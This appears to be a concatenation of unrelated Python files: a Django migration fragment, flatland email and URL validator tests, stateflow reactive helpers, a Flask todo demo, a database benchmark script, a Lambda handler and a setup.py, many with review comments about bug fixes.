    must not be edited — behavior left byte-identical.
    """

    dependencies = [
        ('backend', '0010_auto_20200408_2203'),
    ]

    operations = [
        migrations.CreateModel(
            name='Resolution',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('width', models.PositiveIntegerField()),
                ('height', models.PositiveIntegerField()),
            ],
        ),
        migrations.RemoveField(
            model_name='clip',
            name='height',
        ),
        migrations.RemoveField(
            model_name='clip',
            name='width',
        ),
    ]
|
import re
from flatland import String
from flatland.validation import (
IsEmail,
HTTPURLValidator,
URLCanonicalizer,
URLValidator,
)
from flatland.validation.network import _url_parts
from tests._util import eq_
def email(value):
    """Build a flatland String element named 'email' that keeps whitespace."""
    element = String(value, strip=False, name='email')
    return element
def assert_email_not_valid(value, kw=None):
    """Assert that IsEmail(**kw) rejects *value* and records element errors.

    Fixed: the original used a mutable default argument (``kw={}``); a None
    sentinel is used instead (behavior for all existing callers unchanged).
    """
    validator = IsEmail(**(kw if kw is not None else {}))
    el = email(value)
    assert not validator.validate(el, None)
    assert el.errors
def assert_email_valid(value, kw=None):
    """Assert that IsEmail(**kw) accepts *value* with no element errors.

    Fixed: the original used a mutable default argument (``kw={}``); a None
    sentinel is used instead (behavior for all existing callers unchanged).
    """
    validator = IsEmail(**(kw if kw is not None else {}))
    el = email(value)
    assert validator.validate(el, None)
    assert not el.errors
def test_email():
    """Nose-style generator test: yields one validity check per good address."""
    for addr in (u'bob@noob.com', u'bob@noob.frizbit', u'#"$!+,,@noob.c',
                 u'bob@bob-bob.bob'):
        yield assert_email_valid, addr
def test_email_idna():
    """A non-ASCII (snowman) domain label is accepted — IDNA handling."""
    assert_email_valid(u'bob@snow\u2603man.com')
def test_email_nonlocal():
    """Dotless (local) domains are rejected by default."""
    assert_email_not_valid(u'root@localhost')
def test_email_nonlocal_ok():
    """With nonlocal=False, a local (dotless) domain is accepted."""
    assert_email_valid(u'root@localhost', {'nonlocal': False})
def test_email_altlocal():
    """A custom local-part pattern restricts which mailbox names validate."""
    only_bob = {'local_part_pattern': re.compile(r'^bob$')}
    assert_email_valid('bob@bob.com', only_bob)
    assert_email_not_valid('foo@bar.com', only_bob)
def test_email_bogus():
    """Nose-style generator test: yields one rejection check per bad address."""
    over_long_label = u'x' * 64   # one char past the 63-char DNS label limit
    max_len_label = u'x' * 63
    bad_addresses = (
        u'bob@zig..', u'bob@', u'@bob.com', u'@', u'snork',
        u'bob@zig:zag.com', u'bob@zig zag.com', u'bob@zig/zag.com',
        u' @zig.com', u'\t\t@zag.com',
        u'bob@%s.com' % over_long_label,
        u'bob@%s.%s.%s.%s.com' % (max_len_label, max_len_label,
                                  max_len_label, max_len_label),
        u'foo.com', u'bob@bob_bob.com', u'',
    )
    for addr in bad_addresses:
        yield assert_email_not_valid, addr
def scalar(value):
    """Wrap *value* in a flatland String element named 'test'."""
    element = String(value, name='test')
    return element
def test_url_validator_default():
    """A well-formed URL passes URLValidator with default settings."""
    v = URLValidator()
    el = scalar('http://me:you@there/path#fragment')
    assert v.validate(el, None)
    assert not el.errors
def test_url_validator_schemes():
    """URLs whose scheme is not in `allowed_schemes` fail with `blocked_scheme`."""
    # No scheme allowed at all -> http is blocked.
    v = URLValidator(allowed_schemes=(), blocked_scheme='X')
    el = scalar('http://me:you@there/path#fragment')
    assert not v.validate(el, None)
    eq_(el.errors, ['X'])

    # Only https allowed -> http is still blocked.
    v = URLValidator(allowed_schemes=('https',), blocked_scheme='X')
    el = scalar('http://me:you@there/path#fragment')
    assert not v.validate(el, None)
    eq_(el.errors, ['X'])
def test_url_validator_parts():
    """URL components outside `allowed_parts` fail with `blocked_part`."""
    # Nothing allowed -> any URL fails.
    v = URLValidator(allowed_parts=(), blocked_part='X')
    el = scalar('http://me:you@there/path#fragment')
    assert not v.validate(el, None)
    eq_(el.errors, ['X'])

    # Everything allowed -> passes.
    v = URLValidator(allowed_parts=_url_parts)
    el = scalar('http://me:you@there/path#fragment')
    assert v.validate(el, None)
    assert not el.errors

    # scheme+netloc only: a bare host passes...
    v = URLValidator(allowed_parts=('scheme', 'netloc'))
    el = scalar('http://blarg')
    assert v.validate(el, None)
    assert not el.errors

    # ...but a trailing slash adds a path part, which is blocked.
    v = URLValidator(allowed_parts=('scheme', 'netloc'), blocked_part='X')
    el = scalar('http://blarg/')
    assert not v.validate(el, None)
    eq_(el.errors, ['X'])
def test_http_validator_default():
    """HTTPURLValidator accepts a plain URL but flags embedded credentials."""
    v = HTTPURLValidator(forbidden_part='X')
    el = scalar('http://there/path#fragment')
    assert v.validate(el, None)
    assert not el.errors

    el = scalar('http://phis:ing@there/path#fragment')
    # BUG FIX: the original line was `not v.validate(el, None)` — a bare
    # expression with no effect, so the failing validation was never asserted.
    assert not v.validate(el, None)
    eq_(el.errors, ['X'])
def test_url_canonicalizer_default():
    """By default, canonicalization strips the fragment in place."""
    v = URLCanonicalizer()
    el = scalar('http://localhost/#foo')
    eq_(el.value, 'http://localhost/#foo')
    assert v.validate(el, None)
    eq_(el.value, 'http://localhost/')  # fragment removed
    assert not el.errors
def test_url_canonicalizer_want_none():
    """Discarding every URL part leaves an empty value."""
    v = URLCanonicalizer(discard_parts=_url_parts)
    el = scalar('http://me:you@there/path#fragment')
    eq_(el.value, 'http://me:you@there/path#fragment')
    assert v.validate(el, None)
    eq_(el.value, '')
    assert not el.errors
def test_url_canonicalizer_want_one():
    """Discarding all parts except the first (the scheme) keeps only 'http://'."""
    v = URLCanonicalizer(discard_parts=_url_parts[1:])
    el = scalar('http://me:you@there/path#fragment')
    eq_(el.value, 'http://me:you@there/path#fragment')
    assert v.validate(el, None)
    eq_(el.value, 'http://')
    assert not el.errors
def test_url_canonicalizer_want_all():
    """Discarding nothing leaves the URL untouched."""
    v = URLCanonicalizer(discard_parts=())
    el = scalar('http://me:you@there/path#fragment')
    eq_(el.value, 'http://me:you@there/path#fragment')
    assert v.validate(el, None)
    eq_(el.value, 'http://me:you@there/path#fragment')
    assert not el.errors
|
from typing import Any, Callable, Iterable, Sequence, Tuple
from stateflow import reactive
from stateflow.common import ev
from stateflow.notifier import Notifier, ScopedName, many_notifiers
def get_subnotifier(self: Notifier, name: str) -> Notifier:
    """Return the named subnotifier of *self*, creating it on first use.

    An empty/None *name* designates the object's own ``__notifier__``.
    Subnotifiers are lazily stored in a ``_subnotifiers`` dict on the object.
    """
    # BUG FIX: the original tested `name is ''` — identity comparison with a
    # str literal relies on interning and raises SyntaxWarning on CPython 3.8+.
    if name is None or name == '':
        return self.__notifier__
    if not hasattr(self, '_subnotifiers'):
        setattr(self, '_subnotifiers', dict())
    return self._subnotifiers.setdefault(name, Notifier("subnotifier " + name))
def observable_method(unbound_method, observed: Sequence[str], notified: Sequence[str]):
    """Wrap *unbound_method* as a reactive method.

    The wrapper re-evaluates when any of the `observed` subnotifiers fires,
    and holds the `notified` subnotifiers open while the method executes.
    *unbound_method* may be given by name (forwarded via ``forward_by_name``).
    """
    # @reactive(other_deps=[get_subobservable observed)
    if isinstance(unbound_method, str):
        unbound_method = forward_by_name(unbound_method)

    @reactive(pass_args=[0], dep_only_args=['_additional_deps'])
    def wrapped(self, *args, **kwargs):
        # Entering the notifier contexts presumably batches notifications
        # until the call completes — TODO confirm against Notifier semantics.
        with many_notifiers(*[get_subnotifier(self, observable) for observable in notified]):
            res = unbound_method(ev(self), *args, **kwargs)
        return res

    def wrapped2(self, *args, **kwargs):
        # The observed subnotifiers are passed as dependency-only args so the
        # `reactive` machinery tracks them without forwarding them to the method.
        return wrapped(self, *args, **kwargs,
                       _additional_deps=[get_subnotifier(self, obs) for i, obs in enumerate(observed)])

    return wrapped2
def notifying_method(unbound_method, notified: Sequence[str]):
    """Wrap *unbound_method* so every subnotifier in *notified* fires after it runs.

    *unbound_method* may be given by name (resolved via ``forward_by_name``).
    """
    if isinstance(unbound_method, str):
        unbound_method = forward_by_name(unbound_method)

    def wrapped(self, *args, **kwargs):
        result = unbound_method(ev(self), *args, **kwargs)
        for observable_name in notified:
            get_subnotifier(self, observable_name).notify_observers()
        return result

    return wrapped
def getter(unbound_method, observed):
    """A read-only observable method: depends on *observed*, notifies nothing."""
    return observable_method(unbound_method, observed=observed, notified=[])
def reactive_setter(unbound_method, notified):
    """A mutating observable method: observes nothing, notifies *notified*."""
    return observable_method(unbound_method, observed=[], notified=notified)
def forward_by_name(name):
    """Return an unbound-method-like callable that forwards to ``self.<name>``."""
    def _forwarder(self, *args, **kwargs):
        bound = getattr(self, name)
        return bound(*args, **kwargs)
    return _forwarder
def add_reactive_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
    """
    For operators and methods that don't modify a state of an object (__neg_, etc.).

    Each (name, func) pair is installed on *cl* as a reactive wrapper that
    evaluates `func` on the unwrapped object under a scoped name.
    """
    def add_one(cl: Any, name, func):
        def wrapped(self, *args):
            @reactive  # fixme: we should rather forward to the _target, not to __eval__
            def reactive_f(self_unwrapped, *args):
                return func(self_unwrapped, *args)
            prefix = ''
            if hasattr(self, '__notifier__'):
                # BUG FIX: the original assigned to a misspelled `preifx` and
                # then read `preifx`, so the computed prefix was never stored
                # in `prefix`, and objects WITHOUT a __notifier__ hit a
                # NameError on the read.
                prefix = self.__notifier__.name + '.'
            with ScopedName(name=prefix + name, final=True):
                return reactive_f(self, *args)
        setattr(cl, name, wrapped)
    for name, func in functions:
        add_one(cl, name, func)
def add_assignop_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
    """
    For operators like '+=' and one-arg functions like append, remove

    Each wrapper evaluates the target, applies `func`, assigns the result
    back, and returns `self` (the augmented-assignment protocol).
    """
    def make_forwarder(func):
        def wrapped(self, arg1):
            target = self._target()
            current_value = target.__eval__()
            target.__assign__(func(current_value, arg1))
            return self
        return wrapped

    for name, func in functions:
        setattr(cl, name, make_forwarder(func))
def add_notifying_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
    """
    For operators like '+=' and one-arg functions like append, remove

    Each wrapper mutates the unwrapped target inside its notifier context so
    observers are informed of the change.
    """
    def make_forwarder(func):
        def wrapped(self, *args):
            target = self._target()
            unwrapped = target.__eval__()
            with target.__notifier__:
                return func(unwrapped, *args)
        return wrapped

    for name, func in functions:
        setattr(cl, name, make_forwarder(func))
|
from flask import Flask, render_template, request, redirect, url_for
import uuid
class Task:
    """A single todo item with a unique id and an active/completed state."""

    def __init__(self, task):
        # uuid1 gives a hex id unique enough for this in-memory demo store.
        self.id = uuid.uuid1().hex
        self.task = task
        self.status = 'active'
        self.completed = False

    def toggle(self):
        """Flip between the 'active' and 'completed' states."""
        if self.status != 'active':
            self.status = 'active'
            self.completed = False
        else:
            self.status = 'completed'
            self.completed = True
# Global state, yay!
# In-memory task store keyed by Task.id — lost on restart; fine for a demo.
tasks = {}
app = Flask(__name__)
app.debug = True  # NOTE(review): debug mode must not be enabled in production.
@app.route('/')
def index():
    """Render the task list page."""
    return render_template('index.html', tasks=tasks)
@app.route('/todos', methods = ['POST'])
def todos():
    """Create a task from the posted 'item-text' field and go back to the list."""
    task = Task(task=request.form['item-text'])
    tasks[task.id] = task
    return redirect(url_for('index'))
@app.route('/delete', methods = ['POST'])
def delete_todos():
    """Delete the task whose id was posted (KeyError -> 500 if unknown)."""
    del(tasks[request.form['id']])
    return redirect(url_for('index'))
@app.route('/toggle', methods = ['POST'])
def toggle_todo():
    """Toggle the active/completed state of the posted task id."""
    tasks[request.form['id']].toggle()
    return redirect(url_for('index'))
# Run the Flask development server (debug enabled above).
if __name__ == '__main__':
    app.run()
|
import random, time, logging
from string import ascii_uppercase
# Fixed seed keeps generated benchmark workloads identical across runs.
random.seed(0)
# Timing results are appended to ./stats.log via logging.info calls below.
logging.basicConfig(filename='./stats.log', level=logging.INFO)
def reset_db(db):
    """Wipe every benchmark collection so runs start from an empty database."""
    db.collection("work_batches").delete({})
    for collection in (db.queries, db.models, db.executables, db.properties):
        collection.delete({})
def timer(db, function, *args):
    """Time ``function(*args)`` with the server-side timer enabled.

    The signature makes the original ``timer(*args)`` convention explicit
    (db first, callable second, then its arguments) — fully backward
    compatible with all positional callers.

    Returns:
        (elapsed_seconds, result) tuple.
    """
    db.request("GET", "timer/on", {})
    t0 = time.time()
    res = function(*args)
    t1 = time.time()
    # Fetch and display the server's own timing breakdown before disabling it.
    reports = db.request("GET", "timer", {})['reports']
    pretty_print(reports)
    db.request("GET", "timer/off", {})
    return t1 - t0, res
def pretty_print(reports):
    """Print timer report entries sorted by total time, descending.

    Entries with a null total_time are normalized to 0; entries missing any
    expected field are skipped.
    """
    for entry in reports.values():
        # FIX: original compared with `== None`; identity check is correct.
        if entry['total_time'] is None:
            entry['total_time'] = 0.
    ordered = sorted(reports.items(), key=lambda r: r[1]['total_time'], reverse=True)
    for name, entry in ordered:
        try:
            if entry['total_time'] > 0:
                print('%s %f %i %f %f' % (name, entry['total_time'], entry['count'],
                                          entry['percent_time'], entry['average_time']))
        # FIX: narrowed the original bare `except:` (which also swallowed
        # KeyboardInterrupt/SystemExit) to the failures actually expected here.
        except (KeyError, TypeError):
            continue
def commit(db, collection, sizes, numbers, obj=None, required_fields=None):
    """Commit `number` objects of `size` payload bytes for every (size, number)
    pair, timing each batch and asserting the server stored them all.

    Fixed: mutable default arguments (``obj={}``, ``required_fields=[]``)
    replaced with None sentinels; payload built with ``'a' * size`` instead
    of a per-character join.
    """
    base_obj = {} if obj is None else obj
    required_fields = [] if required_fields is None else required_fields
    for size in sizes:
        for number in numbers:
            print('Committing %i %s with size %i\n' % (number, collection, size))
            objs = []
            for i in range(number):
                new_obj = base_obj.copy()
                new_obj["size"] = size
                new_obj["number"] = number
                new_obj["index"] = i
                new_obj["data"] = 'a' * size
                for field in required_fields:
                    # Unique per (size, number, index) so required fields don't collide.
                    new_obj[field] = str(size) + "_" + str(number) + "_" + str(i)
                objs.append(new_obj)
            t, res = timer(db, db.collection(collection).commit, objs)
            logging.info('%s commit %i %i %f', collection, number, size, t)
            assert len(res['ids']) == number
            print('Finished in %f seconds\n' % (t))
def count(db, collection, sizes, numbers, filter=None):
    """Count committed objects for every (size, number) pair and verify totals.

    Fixed: mutable default argument (``filter={}``) replaced with a None
    sentinel. Note: `filter` was unused in the original as well; it is kept
    only for interface compatibility.
    """
    for size in sizes:
        for number in numbers:
            print('Counting %i %s with size %i\n' % (number, collection, size))
            # Properties nest the benchmark fields under `params`.
            if collection == 'properties':
                new_filter = {
                    "params.size": size,
                    "params.number": number
                }
            else:
                new_filter = {
                    "size": size,
                    "number": number
                }
            t, res = timer(db, db.collection(collection).count, new_filter)
            logging.info('%s count %i %i %f', collection, number, size, t)
            assert res == number
            print('Finished in %f seconds\n' % (t))
def query_collection(db, collection, sizes, numbers, filter=None):
    """Query committed objects for every (size, number) pair and verify counts.

    Fixed: mutable default argument (``filter={}``) replaced with a None
    sentinel. Note: `filter` was unused in the original as well; it is kept
    only for interface compatibility.
    """
    for size in sizes:
        for number in numbers:
            print('Querying %i %s with size %i\n' % (number, collection, size))
            # Properties nest the benchmark fields under `params`.
            if collection == 'properties':
                new_filter = {
                    "params.size": size,
                    "params.number": number
                }
            else:
                new_filter = {
                    "size": size,
                    "number": number
                }
            t, res = timer(db, db.collection(collection).query, new_filter)
            logging.info('%s query %i %i %f', collection, number, size, t)
            # Properties are generated per (model, executable) pair -> number².
            if collection == 'properties':
                assert len(res) == number * number
            else:
                assert len(res) == number
            print('Finished in %f seconds\n' % (t))
def update(db, collection, sizes, numbers, filter=None, update=None):
    """Update every (size, number) batch with a marker field and verify counts.

    Fixed: mutable default arguments replaced with None sentinels. Note: the
    original copied `filter`/`update` and immediately overwrote the copies,
    so both parameters were dead; they are kept only for interface
    compatibility.
    """
    for size in sizes:
        for number in numbers:
            print('Updating %i %s with size %i\n' % (number, collection, size))
            new_filter = {
                "size": size,
                "number": number
            }
            new_update = {
                "new_field": str(size) + "_" + str(number)
            }
            t, res = timer(db, db.collection(collection).update, new_filter, new_update)
            logging.info('%s update %i %i %f', collection, number, size, t)
            assert res == number
            print('Finished in %f seconds\n' % (t))
def stats(db, collection, sizes, numbers, filter=None):
    """Compute server-side stats over the 'size' field per (size, number)
    batch and verify the reported count.

    Fixed: mutable default argument (``filter={}``) replaced with a None
    sentinel; extra filter keys supplied by the caller are still honored.
    """
    base_filter = {} if filter is None else filter
    for size in sizes:
        for number in numbers:
            print('Computing stats %i %s with size %i\n' % (number, collection, size))
            new_filter = base_filter.copy()
            new_filter["size"] = size
            new_filter["number"] = number
            field = "size"
            t, res = timer(db, db.collection(collection).stats, field, new_filter)
            logging.info('%s stats %i %i %f', collection, number, size, t)
            assert res["count"] == number
            print('Finished in %f seconds\n' % (t))
def mapreduce(db, collection, sizes, numbers, filter, mapper, reducer, finalizer):
    """Placeholder for a map-reduce benchmark; intentionally not implemented."""
    print("NOT YET IMPLEMENTED")
def submit(db, sizes, numbers, filters=None):
    """Submit number² queries per (size, number) pair and verify the total.

    Fixed: mutable default argument (``filters={}``) replaced with a None
    sentinel. Caller-supplied sub-filters for input_model/executable/params
    are still honored (and, as in the original shallow copy, mutated in
    place when provided).
    """
    base_filters = {} if filters is None else filters
    for size in sizes:
        for number in numbers:
            print('Submitting %i queries with size %i\n' % (number * number, size))
            new_filters = base_filters.copy()
            # Stamp size/number on each of the three filter sections,
            # creating a section when the caller did not supply one.
            for section in ('input_model', 'executable', 'params'):
                section_filter = new_filters.setdefault(section, {})
                section_filter['size'] = size
                section_filter['number'] = number
            new_filters['params']['run_time'] = 1.0
            t, res = timer(db, db.submit, new_filters)
            logging.info('root submit %i %i %f', number, size, t)
            assert res['total'] == number * number
            print('Finished in %f seconds\n' % (t))
def query(db, sizes, numbers, filters=None):
    """Query the number² submitted items per (size, number) pair and verify.

    Fixed: mutable default argument (``filters={}``) replaced with a None
    sentinel. Caller-supplied sub-filters for input_model/executable/params
    are still honored (and, as in the original shallow copy, mutated in
    place when provided).
    """
    base_filters = {} if filters is None else filters
    for size in sizes:
        for number in numbers:
            print('Querying %i items with size %i\n' % (number * number, size))
            new_filters = base_filters.copy()
            # Stamp size/number on each of the three filter sections,
            # creating a section when the caller did not supply one.
            for section in ('input_model', 'executable', 'params'):
                section_filter = new_filters.setdefault(section, {})
                section_filter['size'] = size
                section_filter['number'] = number
            new_filters['params']['run_time'] = 1.0
            t, res = timer(db, db.query, new_filters)
            logging.info('root query %i %i %f', number, size, t)
            assert len(res) == number * number
            print('Finished in %f seconds\n' % (t))
|
import os
def lambda_handler(event, context):
    """AWS Lambda entry point: greet using the configured environment variable."""
    greeting = os.environ['greeting from lambda']  # KeyError if the env var is unset
    return "{} from Lambda!".format(greeting)
|
#!/usr/bin/env python
# coding: utf-8
import os
import re
from setuptools import setup, find_packages
# Absolute directory of this setup.py; used to locate README.rst reliably
# regardless of the current working directory.
here = os.path.abspath(os.path.dirname(__file__))
def load_readme():
    """Return the contents of the README.rst that sits next to this script."""
    readme_path = os.path.join(here, 'README.rst')
    with open(readme_path) as readme:
        return readme.read()
setup(
    name='addon_sample',
    # Read __version__ straight from the package so it is defined in one place.
    version=re.search(
        r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]',  # It excludes inline comment too
        open('addon_sample/__init__.py').read()).group(1),
    packages=find_packages(exclude=['tests*'])
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.